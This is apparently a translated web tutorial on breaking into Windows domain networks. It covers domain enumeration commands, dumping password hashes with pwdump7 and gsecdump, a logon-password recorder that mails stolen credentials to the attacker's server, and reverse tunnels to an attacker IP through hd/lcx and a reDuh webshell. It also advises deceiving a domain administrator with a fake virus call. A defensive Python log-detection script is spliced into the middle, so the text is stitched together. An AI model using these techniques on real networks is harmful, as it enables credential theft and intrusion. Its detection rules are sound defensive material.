Penetration in the domain environment

Source: Internet
Author: User
Tags: domain server in domain dns spoofing

Intranet penetration, especially in a relatively large network, is likely to run into a special environment: a Windows domain. Penetration in a domain environment is a different story.
First, a brief look at the concept of a domain:
A domain is an independent unit running on a Windows network. For domains to access each other, a trust relationship must be established between them. A trust relationship is a bridge between one domain and another: once a domain has established a trust relationship with other domains, the two domains can not only manage each other as needed, but also allocate device resources such as files and printers across the network, which allows network resources to be shared and managed between different domains.
A domain is not only a logical organizational unit of a Windows network operating system, but also a logical organizational unit of the Internet. In a Windows network operating system, a domain is a security boundary. A domain administrator can only manage their own domain; they can access or manage other domains only when those domains explicitly grant them management permissions. Each domain has its own security policy and its own security trust relationships with other domains.

From the above we can see that the permissions of a domain administrator are quite broad: holding a domain logon ticket, the domain administrator can remotely manage the various computers in the domain and has permission to log on to any machine. So during penetration, one idea is to capture the domain administrator's logon password in some way. Of course, this is just one of the possible approaches.

After obtaining a zombie (compromised host) on the intranet or in the domain, first check the current network environment. Run:

net view

to obtain a list of host names; you can ping the machine names to obtain their IP addresses. Note, however, that the listed machine names only reflect the network browsing structure; they are not necessarily on the same intranet or in the same domain. Run

ipconfig /all

to check whether a domain environment exists. If so, run

net user /domain

to see which users are in the domain, and

net view /domain:testdomain

(testdomain is assumed to be one of the target domains) to see which computers are in the specified domain. To view the administrator users of the domain, run

net group "domain admins" /domain

and then, for a given administrator account (substitute the actual account name for domain-admin):

net user domain-admin /domain

shows that account's last logon time, password expiration time, logon script, group membership and other information.
In general it is better to gather as much network information as possible before the real attack. You can also look for potentially sensitive information by going through the administrator's files; the more information, the better. The second step is to capture the hash values on the local machine. Here we can use the tool pwdump7.exe.
Capturing the hashes with this tool is very easy; run it directly from the command line. The command to export the hashes to a text file is:

pwdump7.exe > 1.txt

Once the hashes are obtained they can be cracked with tools such as LC5, RainbowCrack, SAMInside and ophcrack. If you are lucky, you can use the recovered password to try to log on to other machines on the intranet. Of course, whether you end up with high privileges this way is a matter of luck. Here we also introduce another powerful tool for domain penetration: gsecdump.
Its advantage is that it can export the hashes of all domain users from the domain controller's password store, ntds.dit, and can also export hashes from running processes. In addition, with only local administrator permission it can use hash injection to open a process as the domain administrator, which makes domain penetration easier. See the tool's command-line usage for the available options.
You can also obtain credentials by logging the password the domain administrator uses to log on to the host. Here we use a small tool: Winlogon.
It can intercept the password used to log on to the local machine over 3389, and of course it can intercept the password when the domain administrator logs on to the local machine. You may have to wait a long time for the domain administrator to log on; perhaps the administrator does routine logon checks at a fixed interval, or you can make up a story to trick the domain administrator into logging on. Once, a friend impersonated a server administrator and called the domain administrator, claiming the server was infected with a virus that could not be cleaned, and asked the domain administrator to log on before dealing with the virus. The result can be imagined: the password was recorded successfully! Of course, further methods depend on your own ideas.
Since Winlogon can only record passwords on the local machine, and you do not know when the administrator will log on, you can use the ASP mail version modified and circulated on the Internet, which sends the intercepted user name and password directly to your ASP mail address. However, it seems to apply only to Windows 2003 systems.
The usage is as follows: run Loader.exe and enter your own email address; CreateServer.exe is generated; upload the ASP page to the server; then run the password recorder on the zombie, and post.asp will generate key.txt under your URL address.

With the preparations done, we can start the formal penetration.
Usually there are some machines on the intranet with weak passwords or exploitable overflow vulnerabilities. Exploiting an overflow is a good option, but note that even after a server has been taken over and you have logged on remotely, not all work has to be done on the logon interface, where it might be discovered by the administrator or cause other unknown problems. Besides, if the tools are too large to transfer directly, you can first use port forwarding, VPN and other tunneling techniques to bring the intrusion environment to your local machine and continue the penetration remotely. Several powerful tools can be used here:
① NCPH hd (lcx also works; it is similar)
This method applies when the firewall blocks external connections but both sides have Internet connectivity. Run the following on your local machine:

hd -s listen 53 1180

which forwards data arriving on port 53 to port 1180. Run on the zombie:

hd -s -connect XX.XX 53

(XX.XX is your own IP address). The local machine then receives the reverse-connected proxy. Next, configure it in SocksCap; of course you must first install SocksCap and then set it up in the SocksCap console.

Once connected, you can operate directly through it and drag tools and the like straight into the console window.
② ReDuh (a stepping stone from a webshell)
It applies when you have a webshell and supports ASPX, PHP and JSP. It can forward intranet server ports to the local machine through an HTTP/HTTPS tunnel, forming a connection loop; it is used to reach internal ports of the target server when the target is on an intranet or behind a port policy. The server side is a webshell (there are three versions for different servers: aspx, php and jsp); the client is written in Java, so a local JDK is recommended.
After the webshell is uploaded, run:

ReDuhClient <target server domain name> http 80 /<webshell path>/reDuh.aspx

and then connect to port 1010 with nc:

nc -vv localhost 1010

If the connection succeeds, a prompt is displayed. Enter the command

[createTunnel]1234:XX.XX:3389

(XX.XX is the zombie's IP address or domain name) to forward the remote port 3389 to port 1234 on the local machine. After the tunnel is established, connect mstsc to localhost port 1234.
A GUI version is also provided, which can be used without a local JDK installation.
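From the defender's side, the enumeration commands, the pwdump7/gsecdump hash dumps and the hd/lcx forwarding described above all leave process-creation traces. The following is an added example, not code from the original article: a Python check over constructed log lines in a simplified shape loosely modelled on Windows event 4688 (the timestamp/host/user/cmd field layout is an assumption), which flags each stage and then correlates them per host.

```python
import re

# Constructed sample log lines (not real telemetry), in a simplified shape
# modelled on Windows event 4688 process creation: timestamp, host, user, command line.
SAMPLE_LOG = """\
2024-01-05T09:12:01 host=WS01 user=TEST\\alice cmd=C:\\Windows\\System32\\net.exe view /domain:testdomain
2024-01-05T09:12:07 host=WS01 user=TEST\\alice cmd=net.exe group "domain admins" /domain
2024-01-05T09:13:40 host=WS01 user=TEST\\alice cmd=C:\\Users\\alice\\Downloads\\pwdump7.exe
2024-01-05T09:20:15 host=WS01 user=TEST\\alice cmd=hd.exe -s -connect 203.0.113.10 53
2024-01-05T09:25:00 host=WS02 user=TEST\\bob cmd=net.exe use \\\\fileserver\\share
2024-01-05T09:26:30 host=WS02 user=TEST\\bob cmd=notepad.exe report.txt
"""

# One rule per stage described in the article: domain enumeration with net.exe,
# hash dumping with pwdump7/gsecdump, and hd/lcx port forwarding.
RULES = [
    ("domain_enum",  r"\bnet(?:\.exe)?\s+(?:view|user|group)\b.*?/domain\b", "low"),
    ("cred_dump",    r"\b(?:pwdump7|gsecdump)(?:\.exe)?\b",                  "high"),
    ("port_forward", r"\b(?:hd|lcx)(?:\.exe)?\s+.*\b(?:listen|connect)\b",    "medium"),
]

LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")

def parse_line(line):
    """Split one constructed log line into its fields; None if it does not fit the shape."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None

def match_rules(cmd):
    """Return the (rule, severity) pairs whose pattern appears in a command line."""
    return [(name, sev) for name, pat, sev in RULES if re.search(pat, cmd, re.IGNORECASE)]

def scan(log_text):
    """Run every rule over every parseable line and collect the hits in log order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, sev in match_rules(rec["cmd"]):
            findings.append({"host": rec["host"], "user": rec["user"],
                             "rule": name, "severity": sev, "cmd": rec["cmd"]})
    return findings

def correlate(findings, min_stages=2):
    """Hosts where >= min_stages distinct rules fired: a chain (enumerate, dump, tunnel) beats one stray hit."""
    stages = {}
    for f in findings:
        stages.setdefault(f["host"], set()).add(f["rule"])
    return {host: sorted(rules) for host, rules in stages.items() if len(rules) >= min_stages}
```

On the constructed sample, WS01 trips all three stages while the ordinary `net use` on WS02 trips none; in practice the low-severity enumeration rule is mainly useful through this per-host correlation rather than on its own.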

Once all the connections are ready, the intrusion itself can proceed. There are several common methods:
Overflow:
As mentioned above, weak passwords and overflow vulnerabilities are relatively common on intranets, so common overflow techniques can be used: scan the ports of other machines on the intranet with a port scanner and try weak passwords. Success is hard to predict and depends on the situation. It is generally a bit complicated, because most computers are now patched and the success rate of overflows is far lower than it used to be, but it is still one method.
Spoofing:
There are many types of spoofing, such as ARP spoofing, DNS spoofing, and active and passive session hijacking. The first two can be carried out with the powerful Cain; as for the specific usage of Cain, we will not say much about it, Google will tell you. Session hijacking involves TCP/IP principles, and since it is mainly implemented in Linux environments, I do not understand it very well =. =, so here is only a brief introduction.
TCP uses an end-to-end connection. In data transmission, two sequence numbers are required:
the sequence number field (seq) and the acknowledgement sequence number (ackseq).
seq indicates the position of the data carried in this segment within the whole data stream sent by the sending host; ackseq indicates the sequence number of the next octet the sending host expects to receive. The relationship between the two is:
The seq value in the packet to be sent should be equal to a in the packet it just received
